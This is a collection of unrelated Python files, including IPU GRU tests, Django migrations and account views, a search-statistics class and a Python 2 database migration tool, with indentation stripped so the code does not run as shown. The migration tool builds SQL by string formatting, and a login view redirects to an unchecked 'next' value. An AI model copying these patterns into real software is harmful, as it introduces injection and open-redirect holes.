cfg = IPUConfig()
report_helper = tu.ReportHelper()
report_helper.set_autoreport_options(cfg)
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
with self.session() as sess:
pinputs1 = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
name="inputs1")
pinputs2 = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
name="inputs2")
plabels = array_ops.placeholder(np.int32, [BATCH_SIZE], name="labels")
with ops.device("/device:IPU:0"):
def gru_layer(inputs, name):
initial_state = _get_variable(
"initial_state",
shape=[BATCH_SIZE, NUM_CHANNELS],
initializer=init_ops.constant_initializer(0.1, DATA_TYPE))
return self._GRULayer(inputs=inputs,
weights_value=1.,
seq_length=None,
seq_val=None,
att_scores=None,
initial_state=initial_state,
training=True,
name=name)
with variable_scope.variable_scope("gru_layer1", use_resource=True):
logits1 = gru_layer(pinputs1, "layer1")
with variable_scope.variable_scope("gru_layer2", use_resource=True):
logits2 = gru_layer(pinputs2, "layer2")
logits = (math_ops.reduce_mean(logits1, axis=0) +
math_ops.reduce_mean(logits2, axis=0))
softmax = nn.sparse_softmax_cross_entropy_with_logits_v2(
logits=logits, labels=array_ops.stop_gradient(plabels))
loss = math_ops.reduce_mean(softmax)
train = gradient_descent.GradientDescentOptimizer(0.01).minimize(loss)
sess.run(variables.global_variables_initializer())
report_helper.clear_reports()
sess.run(
[loss, train], {
pinputs1: _createGRUInput(0.5, pinputs1.shape),
pinputs2: _createGRUInput(1.5, pinputs2.shape),
plabels: np.ones(shape=[BATCH_SIZE], dtype=np.int32),
})
report = pva.openReport(report_helper.find_report())
self.assert_compute_sets_matches(
report, '*BasicGruCell/ProcessUnits/Weight/Conv*/Convolve', 2,
"There should be two fwd GRUs")
self.assert_compute_sets_matches(report, '*/MulOGate/Op/Multiply', 1,
"There should be one bwd GRU")
def testGRUNotCached(self):
cfg = IPUConfig()
report_helper = tu.ReportHelper()
report_helper.set_autoreport_options(cfg)
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
with self.session() as sess:
# Note here the second GRU is larger.
pinputs1 = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
name="inputs1")
pinputs2 = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN * 2, BATCH_SIZE, INPUT_SIZE],
name="inputs2")
plabels = array_ops.placeholder(np.int32, [BATCH_SIZE], name="labels")
with ops.device("/device:IPU:0"):
def gru_layer(inputs, name):
initial_state = _get_variable(
"initial_state",
shape=[BATCH_SIZE, NUM_CHANNELS],
initializer=init_ops.constant_initializer(0.1, DATA_TYPE))
return self._GRULayer(inputs=inputs,
weights_value=1.,
seq_length=None,
seq_val=None,
att_scores=None,
initial_state=initial_state,
training=True,
name=name)
with variable_scope.variable_scope("gru_layer1", use_resource=True):
logits1 = gru_layer(pinputs1, "layer1")
with variable_scope.variable_scope("gru_layer2", use_resource=True):
logits2 = gru_layer(pinputs2, "layer2")
logits = (math_ops.reduce_mean(logits1, axis=0) +
math_ops.reduce_mean(logits2, axis=0))
softmax = nn.sparse_softmax_cross_entropy_with_logits_v2(
logits=logits, labels=array_ops.stop_gradient(plabels))
loss = math_ops.reduce_mean(softmax)
train = gradient_descent.GradientDescentOptimizer(0.01).minimize(loss)
sess.run(variables.global_variables_initializer())
report_helper.clear_reports()
sess.run(
[loss, train], {
pinputs1: _createGRUInput(0.5, pinputs1.shape),
pinputs2: _createGRUInput(1.5, pinputs2.shape),
plabels: np.ones(shape=[BATCH_SIZE], dtype=np.int32),
})
report = pva.openReport(report_helper.find_report())
self.assert_compute_sets_matches(
report, '*BasicGruCell/ProcessUnits/Weight/Conv*/Convolve', 4,
"There should be four fwd GRUs")
self.assert_compute_sets_matches(report, '*/MulOGate/Op/Multiply', 2,
"There should be two bwd GRUs")
@parameterized.parameters((True,), (False,))
def testGRUWithAvailableMemoryProportionFwd(self, valid_value):
cfg = IPUConfig()
report_helper = tu.ReportHelper()
report_helper.set_autoreport_options(cfg)
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
with self.session() as sess:
pinputs = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN, BATCH_SIZE, INPUT_SIZE],
name="inputs")
pinitial_state = array_ops.placeholder(DATA_TYPE,
[BATCH_SIZE, NUM_CHANNELS],
name="initial_state")
gru_output_seq = self._GRULayer(
inputs=pinputs,
weights_value=1.,
seq_length=None,
seq_val=None,
att_scores=None,
initial_state=pinitial_state,
training=False,
name=None,
options={"availableMemoryProportion": 0.7 if valid_value else -123.})
sess.run(variables.global_variables_initializer())
def run_gru():
sess.run(
gru_output_seq, {
pinputs: _createGRUInput(0.7, pinputs.shape),
pinitial_state: _createGRUInitialState(1.,
pinitial_state.shape)
})
if valid_value:
run_gru()
else:
self.assertRaisesRegex(errors.InternalError,
"Value must be greater than or equal to 0",
run_gru)
def testGRUGreaterAvailableMemoryProportionFwdMeansGreaterTotalTileMemory(
self):
cfg = IPUConfig()
report_helper = tu.ReportHelper()
report_helper.set_autoreport_options(cfg, output_execution_profile=True)
cfg.ipu_model.compile_ipu_code = True
cfg.ipu_model.tiles_per_ipu = 32
cfg.configure_ipu_system()
name = "availableMemoryProportion"
batch_size = 256
input_size = 256
num_channels = 256
def run_gru(amp_val):
with self.session() as sess:
with variable_scope.variable_scope("gru_" +
str(amp_val).replace(".", "_"),
use_resource=True):
pinputs = array_ops.placeholder(DATA_TYPE,
[SEQ_LEN, batch_size, input_size],
name="inputs")
pinitial_state = array_ops.placeholder(DATA_TYPE,
[batch_size, num_channels],
name="initial_state")
gru_output_seq = self._GRULayer(
inputs=pinputs,
weights_value=1.,
seq_length=None,
seq_val=None,
att_scores=None,
initial_state=pinitial_state,
training=False,
name=name,
input_size=input_size,
num_channels=num_channels,
options={"availableMemoryProportion": amp_val})
utils.move_variable_initialization_to_cpu()
sess.run(variables.global_variables_initializer())
sess.run(
gru_output_seq, {
pinputs: _createGRUInput(0.7, pinputs.shape),
pinitial_state: _createGRUInitialState(1.,
pinitial_state.shape)
})
run_gru(0.8)
run_gru(0.1)
report_paths = report_helper.find_reports()
self.assertEqual(len(report_paths), 2)
reports = [pva.openReport(report) for report in report_paths]
self.assertGreater(_totalTileMemory(reports[0]),
_totalTileMemory(reports[1]))
def _run_single_gru_training_step(self,
name,
batch_size=BATCH_SIZE,
input_size=INPUT_SIZE,
num_channels=NUM_CHANNELS,
amp_val=None):
self._RunGRULayerTraining(
name=name,
input_value=0.,
weights_value=0.7,
init_state_value=1.,
training_steps=1,
seq_val=None,
att_score_val=0.5,
labels_array=np.ones(shape=[batch_size], dtype=np.int32),
gru_layer_function=self._GRULayer,
device_string="/device:IPU:0",
batch_size=batch_size,
input_size=input_size,
num_channels=num_channels,
options_bwd={"availableMemoryProportion": amp_val})
@parameterized.parameters((True), (False))
def testGRUWithAvailableMemoryProportionBwd(self, valid_value):
cfg = IPUConfig()
report_helper = tu.ReportHelper()
report_helper.set_autoreport_options(cfg)
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
name = ("" if valid_value else "in") + "validAvailableMemoryProportionBwd"
if valid_value:
self._run_single_gru_training_step(name, amp_val=0.7)
else:
with self.assertRaisesRegex(errors.InternalError,
"Value must be greater than or equal to 0"):
self._run_single_gru_training_step(name, amp_val=-123.)
def testGRUGreaterAvailableMemoryProportionBwdMeansGreaterTotalTileMemory(
self):
cfg = IPUConfig()
report_helper = tu.ReportHelper()
report_helper.set_autoreport_options(cfg, output_execution_profile=True)
cfg.ipu_model.compile_ipu_code = True
cfg.ipu_model.tiles_per_ipu = 32
cfg.configure_ipu_system()
name = "availableMemoryProportion"
batch_size = 256
input_size = 256
num_channels = 256
self._run_single_gru_training_step(name,
batch_size=batch_size,
input_size=input_size,
num_channels=num_channels,
amp_val=0.8)
self._run_single_gru_training_step(name,
batch_size=batch_size,
input_size=input_size,
num_channels=num_channels,
amp_val=0.1)
report_paths = report_helper.find_reports()
self.assertEqual(len(report_paths), 2)
reports = [pva.openReport(report) for report in report_paths]
self.assertGreater(_totalTileMemory(reports[0]),
_totalTileMemory(reports[1]))
if __name__ == "__main__":
os.environ['TF_XLA_FLAGS'] = ('--tf_xla_min_cluster_size=1 ' +
os.environ.get('TF_XLA_FLAGS', ''))
googletest.main()
|
__author__ = "Nick Anderson"
### Stats
# This class tracks various stats for Searcher objects to print out in below format.
class Stats:
# Takes in a search type, map file, hfn, and total nodes from Searcher object
def __init__(self, newSearchType, infile, newHfn, newTotalNodes):
# Initialize varibles with default values
self.searchType = newSearchType
self.mapFile = infile
self.hfn = newHfn
self.totalNodes = newTotalNodes
self.startNode = ''
self.goalNode = []
self.endCost = 0
self.endPath = []
self.frontierTotal = 0
self.frontierMax = 0
self.depthTotal = 0
self.depthMax = 0
self.branchingTotal = 0
self.branchingAve = 0
self.expansion = []
# Prints to terminal detailed stats of searcher object, additional stats for A* search and if in verbose mode
def printStats(self, verbose):
print('------------------------')
print('SEARCH SUMMARY STATS:')
print('Search Type: {}. Map file: {} Total Nodes in Graph: {}'.format(self.searchType, self.mapFile, self.totalNodes))
if self.searchType == 'A*':
print('Using h-function: {}'.format(self.hfn))
print('Start node: {} ; Goal node(s): {}'.format(self.startNode, self.goalNode))
print('Searched total of {} nodes out of total of {} in graph'.format(len(self.expansion), self.totalNodes))
print('Ended at Node: {} with path cost: {}'.format(self.expansion[-1], self.endCost))
print('Path ({}): {}'.format(len(self.endPath), self.endPath))
print('Frontier size: Average= {:.2f} ; Max size= {}'.format(self.frontierTotal / len(self.expansion), self.frontierMax))
print('Depth of search: Average= {:.2f} ; Max Depth= {}'.format(self.depthTotal / len(self.expansion), self.depthMax))
print('Average branching factor= {:.2f}'.format(self.branchingTotal / len(self.expansion)))
if verbose:
print('Order of Node Expansion: {}'.format(self.expansion))
print('------------------------')
print('')
# Sets start and end goals
def setStartGoal(self, newStart, newGoal):
self.startNode = newStart
self.goalNode = newGoal
# Updates order of node expansion
def setExpansion(self, newExpansion):
self.expansion = newExpansion
# Sets end cost of search from last node explored
def setEndCost(self, cost):
self.endCost = cost
# Sets end path of search from last node explored
def setEndPath(self, path):
self.endPath = path
# Updates total branching factors to be used in calculating average branching factor
def updateBranching(self, branching):
self.branchingTotal = self.branchingTotal + branching
# Updates total depth factors to be used in calculating average depth factor and max depth
def updateDepth(self, depth):
self.depthTotal = self.depthTotal + depth
if depth > self.depthMax:
self.depthMax = depth
# Updates total frontier size to be used in calculating average frontier factor and max frontier
def updateFrontier(self, frontier):
self.frontierTotal = self.frontierTotal + frontier
if frontier > self.frontierMax:
self.frontierMax = frontier
|
# Generated by Django 3.1.2 on 2020-11-03 18:41
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import pyuploadcare.dj.models
import tinymce.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('auth', '0012_alter_user_first_name_max_length'),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('prof_pic', pyuploadcare.dj.models.ImageField(blank=True)),
('bio', tinymce.models.HTMLField()),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to='auth.user')),
],
),
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', pyuploadcare.dj.models.ImageField(blank=True)),
('post_name', models.CharField(max_length=50)),
('post_caption', tinymce.models.HTMLField(blank=True)),
('post_date', models.DateTimeField(auto_now=True)),
('likes', models.BooleanField(default=False)),
('profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('-post_date',),
},
),
migrations.CreateModel(
name='Comments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment', tinymce.models.HTMLField()),
('posted_on', models.DateTimeField(auto_now=True)),
('post', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Hood.post')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
# Generated by Django 2.1.7 on 2019-04-19 20:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0010_product_img'),
]
operations = [
migrations.AddField(
model_name='bill',
name='paid',
field=models.BooleanField(default=False),
),
]
|
#Ask an user to enter a number. Find out if this number is Odd or Even
def odd_even(n):
if n > 0:
if n %2 == 0 :
print (f'{n} is even')
else:
print (f'{n} is odd')
odd_even (int(input("Enter the number : "))) |
import requests
from django.shortcuts import get_object_or_404, render, redirect
from django.contrib import messages, auth
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.sites.shortcuts import get_current_site
from django.contrib.auth.tokens import default_token_generator
from django.template.loader import get_template
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.utils.encoding import force_bytes
from django.core.mail import EmailMessage
from carts.views import _cart_id
from carts.models import Cart, CartItem
from orders.models import Order, OrderProduct
from .forms import RegistrationForm, UserForm, UserProfileForm
from .models import User, UserProfile
@user_passes_test(lambda user: not user.is_authenticated, login_url='home')
def register(request):
if request.method == 'POST':
form = RegistrationForm(request.POST)
if form.is_valid():
firstname = form.cleaned_data['firstname']
lastname = form.cleaned_data['lastname']
phone_number = form.cleaned_data['phone_number']
email = form.cleaned_data['email']
password = form.cleaned_data['password']
username = email.split('@')[0]
user = User.objects.create_user(
email=email,
password=password,
phone_number=phone_number,
firstname=firstname,
lastname=lastname,
username=username
)
user.save()
# create user profile
profile = UserProfile()
profile.user = user
profile.profile_picture = 'default/default-user.png'
profile.save()
current_site = get_current_site(request)
mail_subject = 'Account Activation'
message = get_template('users/account_activation_email.html').render({
'user': user,
'domain': current_site,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': default_token_generator.make_token(user)
})
send_email = EmailMessage(mail_subject, message, to=[email])
send_email.content_subtype = 'html'
send_email.send()
messages.success(
request, 'User registered successfully! \
Please check your email to activate your account')
return redirect('register')
else:
form = RegistrationForm()
context = {
'form': form,
}
return render(request, 'users/register.html', context)
@user_passes_test(lambda user: not user.is_authenticated, login_url='home')
def login(request):
if request.method == 'POST':
email = request.POST.get('email')
password = request.POST.get('password')
user = auth.authenticate(email=email, password=password)
if user is not None:
try:
cart = Cart.objects.get(cart_id=_cart_id(request))
is_cart_item_exists = CartItem.objects.filter(
cart=cart).exists()
if is_cart_item_exists:
cart_items = CartItem.objects.filter(cart=cart)
product_variations = []
product_quantities = []
for cart_item in cart_items:
variations = cart_item.variations.all()
product_variations.append(list(variations))
product_quantities.append(cart_item.quantity)
cart_items = CartItem.objects.filter(user=user)
ex_var_list = []
items_ids = []
for item in cart_items:
ex_var_list.append(list(item.variations.all()))
items_ids.append(item.id)
for product_variation in product_variations:
if product_variation in ex_var_list:
index = ex_var_list.index(product_variation)
item_id = items_ids[index]
item = CartItem.objects.get(id=item_id)
item.quantity += product_quantities[product_variations.index(
product_variation)]
item.user = user
item.save()
else:
item = CartItem.objects.get(cart=cart)
item.user = user
item.save()
except:
pass
auth.login(request, user)
messages.success(request, 'You are now logged in')
url = request.META.get('HTTP_REFERER')
try:
query = requests.utils.urlparse(url).query
params = dict(x.split('=') for x in query.split('&'))
if 'next' in params:
return redirect(params['next'])
except:
return redirect('dashboard')
else:
messages.error(request, 'Invalid credentials')
return redirect('login')
return render(request, 'users/login.html')
@login_required(login_url='login')
def logout(request):
auth.logout(request)
messages.success(request, 'You are now logged out')
return redirect('login')
def activate(request, uidb64, token):
try:
uid = urlsafe_base64_decode(uidb64).decode()
user = User.objects.get(pk=uid)
except(TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and default_token_generator.check_token(user, token):
user.is_active = True
user.save()
messages.success(
request, 'Congratulations! Your account is successfully activated')
return redirect('login')
else:
messages.error(request, 'Invalid activation link')
return redirect('register')
@login_required(login_url='login')
def dashboard(request):
orders = Order.objects.order_by(
'-created_at').filter(user=request.user, is_ordered=True)
profile = UserProfile.objects.get(user=request.user)
context = {
'orders_count': orders.count(),
'profile': profile
}
return render(request, 'users/dashboard.html', context)
@user_passes_test(lambda user: not user.is_authenticated, login_url='home')
def forgot_password(request):
if request.method == 'POST':
email = request.POST.get('email')
user_exists = User.objects.filter(email=email).exists()
if user_exists:
user = User.objects.get(email__exact=email)
current_site = get_current_site(request)
mail_subject = 'Reset Password'
message = get_template('users/reset_password_email.html').render({
'user': user,
'domain': current_site,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': default_token_generator.make_token(user)
})
send_email = EmailMessage(mail_subject, message, to=[email])
send_email.content_subtype = 'html'
send_email.send()
messages.success(request, 'Link sent successfully! \
Please check your email to continue')
return redirect('forgot_password')
else:
messages.error(request, 'User with the given email does not exist')
return redirect('forgot_password')
return render(request, 'users/forgot_password.html')
def reset_password_validate(request, uidb64, token):
try:
uid = urlsafe_base64_decode(uidb64).decode()
user = User.objects.get(pk=uid)
except(TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and default_token_generator.check_token(user, token):
request.session['uid'] = uid
messages.success(request, 'Please reset your password')
return redirect('reset_password')
else:
messages.error(request, 'Invalid reset password link')
return redirect('forgot_password')
@user_passes_test(lambda user: not user.is_authenticated, login_url='home')
def reset_password(request):
if request.method == 'POST':
password = request.POST.get('password')
confirm_password = request.POST.get('confirm_password')
if password == confirm_password:
uid = request.session.get('uid')
user = User.objects.get(pk=uid)
user.set_password(password)
user.save()
messages.success(request, 'Password reset successfully')
return redirect('login')
else:
messages.error(request, 'Passwords do not match')
return redirect('reset_password')
return render(request, 'users/reset_password.html')
@login_required(login_url='login')
def my_orders(request):
orders = Order.objects.order_by(
'-created_at').filter(user=request.user, is_ordered=True)
context = {
'orders': orders
}
return render(request, 'users/my_orders.html', context)
@login_required(login_url='login')
def edit_profile(request):
user_profile = get_object_or_404(UserProfile, user=request.user)
if request.method == 'POST':
user_form = UserForm(request.POST, instance=request.user)
profile_form = UserProfileForm(request.POST, request.FILES, instance=user_profile)
if user_form.is_valid() and profile_form.is_valid():
user_form.save()
profile_form.save()
messages.success(request, 'Your profile has been updated successfully')
return redirect('dashboard')
else:
user_form = UserForm(instance=request.user)
profile_form = UserProfileForm(instance=user_profile)
context = {
'user_form': user_form,
'profile_form': profile_form,
'user_profile': user_profile
}
return render(request, 'users/edit_profile.html', context)
@login_required(login_url='login')
def change_password(request):
if request.method == 'POST':
current_password = request.POST['current_password']
new_password = request.POST['new_password']
confirm_password = request.POST['confirm_password']
user = User.objects.get(username__exact=request.user.username)
if new_password == confirm_password:
success = user.check_password(current_password)
if success:
user.set_password(new_password)
user.save()
messages.success(request, 'Your password has been updated successfully')
return redirect('dashboard')
else:
messages.error(request, 'Please enter valid current password')
return redirect('change_password')
else:
messages.error(request, 'Passwords do not match')
return render(request, 'users/change_password.html')
@login_required(login_url='login')
def order_details(request, order_id):
order_products = OrderProduct.objects.filter(order__order_number=order_id)
order = Order.objects.get(order_number=order_id)
sub_total = 0
for product in order_products:
sub_total += product.product_price * product.quantity
context = {
'order_products': order_products,
'order': order,
'subtotal': sub_total
}
return render(request, 'users/order_details.html', context)
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import os
import sys
import time
import datetime
from tool_base import ToolBase
import config.adx as configAdx
import config.db as configDb
import binascii
class toolNewUser(ToolBase):
cutTableNum = configAdx.USER_TABLE_COUNTS # 分表个数
cutTable_pr = "user_" # 分表前缀
limit_count = 2000 # configAdx.LIMIT_COUNTS #每次提取的数据量
dataLenght = 0
def init(self):
self.old_user_table = "intergration_report_new_user"
self.dbNewUserDataDB = self.initDb(configDb.MYSQL_MOBGI_USER)
self.dbOldUserDataDB = self.initDb(configDb.MYSQL_MOBGI_DATA_OLD)
def checkCondition(self, startPosition):
if startPosition < self.lastPosition:
return True
# 检测边界,按照降序排列
sql = "select created_at from %s order by created_at desc limit 0,1 " % (self.old_user_table)
result = self.dbOldUserDataDB.fetchone(sql)
if result is None:
return False
else:
self.lastPosition = int(time.mktime(result['created_at'].timetuple()))
return startPosition <= self.lastPosition
# 取出旧表数据
def getRecordList(self):
sql = "select * from %s order by created_at limit %s" % (self.old_user_table, self.limit_count)
result, self.dataLenght = self.dbOldUserDataDB.fetchall(sql)
if self.dataLenght > 0:
self.nextPosition = int(time.mktime(result[0]['created_at'].timetuple()))
return result
else:
return False
# 写入新表数据
def addFromoldTable(self, data):
inserData = {}
delData = []
for value in data:
tableId = self.cutTable(value['uuid'])
if tableId not in inserData:
inserData[tableId] = []
createDate, createTime = self.dateTimeToFormat(str(value['created_at']))
inserData[tableId].append((value['app_key'], value['uuid'], createDate, createTime, value['bitmap'], createDate))
delData.append({
'app_key': value['app_key'],
'uuid': value['uuid']
})
self.info('inserData')
for tableId in inserData:
tableName = self.cutTable_pr + str(tableId)
sql = "insert into " + tableName + " (app_key,uuid,channel_gid,create_date,create_time,bitmap) " \
"values (%s,%s,0,%s,%s,%s) on duplicate key update create_date=%s"
result = self.dbNewUserDataDB.executeMany(sql, inserData[tableId])
if result is False:
return False
self.info('delData')
for item in delData:
delcheck = self.delOldTableData(item['uuid'], item['app_key'])
return True
# 转换时间格式
def dateTimeToFormat(self, dateTime):
timeArray = time.strptime(dateTime, "%Y-%m-%d %H:%M:%S")
createDate = time.strftime("%Y-%m-%d", timeArray)
createTime = time.strftime("%H:%M:%S", timeArray)
return createDate, createTime
# 删除旧表数据
def delOldTableData(self, uuid, appKey):
sql = "delete from %s where uuid='%s' and app_key='%s'" % (self.old_user_table, uuid, appKey)
return self.dbOldUserDataDB.execute(sql)
# 分表策略
def cutTable(self, uuid):
# tableNo = binascii.crc32(uuid) % self.cutTableNum
# return self.cutTable_pr + '_' + str(tableNo)
return binascii.crc32(uuid) % self.cutTableNum
def run(self, lastPosition):
try:
startTimeStamp = time.time()
self.lastPosition = lastPosition
self.startPosition, status = self.getStartPosition()
if self.checkCondition(self.startPosition) is not True:
self.dataLenght = 0
self.info("No data")
return False
# 解析保存数据
self.info("startPosition:" + str(datetime.datetime.fromtimestamp(self.startPosition)))
recordList = self.getRecordList()
if self.addFromoldTable(recordList) is not True:
self.dataLenght = 0
self.info("save Data error!")
else:
self.updatePosition()
self.info("use time : " + str(time.time() - startTimeStamp))
except Exception, e:
self.error("run error:" + str(e))
if __name__ == '__main__':
sleepCount = 0
lastPosition = 0
while 1:
obj = toolNewUser('tool_new_user')
if obj.errorFlag:
obj = None
time.sleep(configAdx.SLEEP_SECOND)
continue
if sleepCount > 10: # 错误过多自动退出
obj.error("too many error to quit")
break
if obj.errorFlag:
obj = None
time.sleep(configAdx.SLEEP_SECOND)
sleepCount += 1
obj.run(lastPosition)
lastPosition = obj.lastPosition
if obj.dataLenght == 0:
sleepCount += 1
obj.info("zzz")
obj = None
time.sleep(configAdx.SLEEP_SECOND)
else:
sleepCount = 0
|
# coding = utf-8
"""
@author: sy
@file: sql_items.py
@time: 2018/11/15 21:14
@desc: 根据不同的需求定制不同类的自定义sql
"""
# 豆瓣自定义sql
class DouBanSqlItems(object):
def get_select_sql(self):
""" 查询评论的sql """
select_comments = "SELECT t.short_comment from douban t"
return select_comments
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2019-11-01 13:18
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('dataentry', '0118_auto_20191028_1425'),
]
operations = [
migrations.CreateModel(
name='IntercepteeCambodia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(blank=True, default='', upload_to='interceptee_photos')),
('anonymized_photo', models.CharField(max_length=126, null=True)),
('kind', models.CharField(choices=[('v', 'Victim'), ('t', 'Trafficker'), ('u', 'Unknown')], max_length=4)),
('relation_to', models.CharField(blank=True, max_length=255)),
('trafficker_taken_into_custody', models.BooleanField(default=False, verbose_name='taken_into_custody')),
],
options={
'ordering': ['id'],
},
),
migrations.CreateModel(
name='IrfAttachmentCambodia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('attachment_number', models.PositiveIntegerField(blank=True, null=True)),
('description', models.CharField(max_length=126, null=True)),
('attachment', models.FileField(upload_to='scanned_irf_forms', verbose_name='Attach scanned copy of form (pdf or image)')),
('private_card', models.BooleanField(default=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='IrfCambodia',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(default='pending', max_length=20, verbose_name='Status')),
('date_time_entered_into_system', models.DateTimeField(auto_now_add=True)),
('date_time_last_updated', models.DateTimeField(auto_now=True)),
('irf_number', models.CharField(max_length=20, unique=True, verbose_name='IRF #:')),
('number_of_victims', models.PositiveIntegerField(blank=True, null=True, verbose_name='# of victims:')),
('location', models.CharField(max_length=255, verbose_name='Location:')),
('date_time_of_interception', models.DateTimeField(verbose_name='Date/Time:')),
('number_of_traffickers', models.PositiveIntegerField(blank=True, null=True, verbose_name='# of traffickers')),
('staff_name', models.CharField(max_length=255, verbose_name='Staff Name:')),
('drugged_or_drowsy', models.BooleanField(default=False, verbose_name='Girl appears drugged or drowsy')),
('who_in_group_husbandwife', models.BooleanField(default=False, verbose_name='Husband / Wife')),
('married_in_past_2_weeks', models.BooleanField(default=False, verbose_name='Married in the past 2 weeks')),
('married_in_past_2_8_weeks', models.BooleanField(default=False, verbose_name='Married within the past 2-8 weeks')),
('caught_in_lie', models.BooleanField(default=False, verbose_name='Caught in a lie or contradiction')),
('other_red_flag', models.CharField(blank=True, max_length=255)),
('where_going_destination', models.CharField(blank=True, max_length=126, verbose_name='Location:')),
('where_going_job', models.BooleanField(default=False, verbose_name='Job')),
('passport_with_broker', models.BooleanField(default=False, verbose_name='Passport is with a broker')),
('job_too_good_to_be_true', models.BooleanField(default=False, verbose_name='Job is too good to be true')),
('not_real_job', models.BooleanField(default=False, verbose_name='Not a real job')),
('couldnt_confirm_job', models.BooleanField(default=False, verbose_name='Could not confirm job')),
('where_going_study', models.BooleanField(default=False, verbose_name='Study')),
('no_enrollment_docs', models.BooleanField(default=False, verbose_name='No documentation of enrollment')),
('doesnt_know_school_name', models.BooleanField(default=False, verbose_name="Does not Know School's Name and location")),
('no_school_phone', models.BooleanField(default=False, verbose_name='No phone number for School')),
('not_enrolled_in_school', models.BooleanField(default=False, verbose_name='Not enrolled in school')),
('where_runaway', models.BooleanField(default=False, verbose_name='Runaway')),
('running_away_over_18', models.BooleanField(default=False, verbose_name='Running away from home (18 years or older)')),
('running_away_under_18', models.BooleanField(default=False, verbose_name='Running away from home (under 18 years old)')),
('reluctant_family_info', models.BooleanField(default=False, verbose_name='Reluctant to give family info')),
('refuses_family_info', models.BooleanField(default=False, verbose_name='Will not give family info')),
('under_18_cant_contact_family', models.BooleanField(default=False, verbose_name='No family contact established')),
('under_18_family_doesnt_know', models.BooleanField(default=False, verbose_name="Family doesn't know she is going to India")),
('under_18_family_unwilling', models.BooleanField(default=False, verbose_name='Family unwilling to let her go')),
('talked_to_family_member', models.CharField(blank=True, max_length=127)),
('reported_total_red_flags', models.IntegerField(blank=True, null=True, verbose_name='Reported Total Red Flag Points:')),
('computed_total_red_flags', models.IntegerField(blank=True, null=True, verbose_name='Computed Total Red Flag Points:')),
('who_noticed', models.CharField(max_length=127, null=True)),
('staff_who_noticed', models.CharField(blank=True, max_length=255, verbose_name='Staff who noticed:')),
('type_of_intercept', models.CharField(max_length=127, null=True)),
('how_sure_was_trafficking', models.IntegerField(choices=[(1, '1 - Not at all sure'), (2, '2 - Unsure but suspects it'), (3, '3 - Somewhat sure'), (4, '4 - Very sure'), (5, '5 - Absolutely sure')], null=True, verbose_name='How sure are you that it was trafficking case?')),
('convinced_by_staff', models.CharField(blank=True, max_length=127)),
('convinced_by_family', models.CharField(blank=True, max_length=127)),
('convinced_by_police', models.CharField(blank=True, max_length=127)),
('evidence_categorization', models.CharField(max_length=127, null=True)),
('reason_for_intercept', models.TextField(blank=True, verbose_name='Primary reason for intercept')),
('has_signature', models.BooleanField(default=False, verbose_name='Scanned form has signature?')),
('logbook_received', models.DateField(null=True)),
('logbook_incomplete_questions', models.CharField(blank=True, max_length=127)),
('logbook_incomplete_sections', models.CharField(blank=True, max_length=127)),
('logbook_information_complete', models.DateField(null=True)),
('logbook_notes', models.TextField(blank=True, verbose_name='Logbook Notes')),
('logbook_submitted', models.DateField(null=True)),
('logbook_first_verification', models.CharField(blank=True, max_length=127)),
('logbook_first_reason', models.TextField(blank=True, verbose_name='First Reason')),
('logbook_followup_call', models.CharField(blank=True, max_length=127)),
('logbook_first_verification_date', models.DateField(null=True)),
('logbook_leadership_review', models.CharField(blank=True, max_length=127)),
('logbook_second_verification', models.CharField(blank=True, max_length=127)),
('logbook_second_reason', models.TextField(blank=True, verbose_name='Second Reason')),
('logbook_second_verification_date', models.DateField(null=True)),
('logbook_back_corrected', models.TextField(blank=True, verbose_name='Back Corrected')),
('who_in_group_alone', models.BooleanField(default=False, verbose_name='Alone')),
('who_in_group_relative', models.BooleanField(default=False, verbose_name='Own brother, sister / relative')),
('who_in_group_broker', models.BooleanField(default=False, verbose_name='Broker/Other Person')),
('meeting_someone_across_border', models.BooleanField(default=False, verbose_name='Is meeting a someone just across border')),
('meeting_someone_they_dont_know', models.BooleanField(default=False, verbose_name="Supposed to meet someone they don't know")),
('crossing_border_separately', models.BooleanField(default=False, verbose_name='Someone who is crossing border separately')),
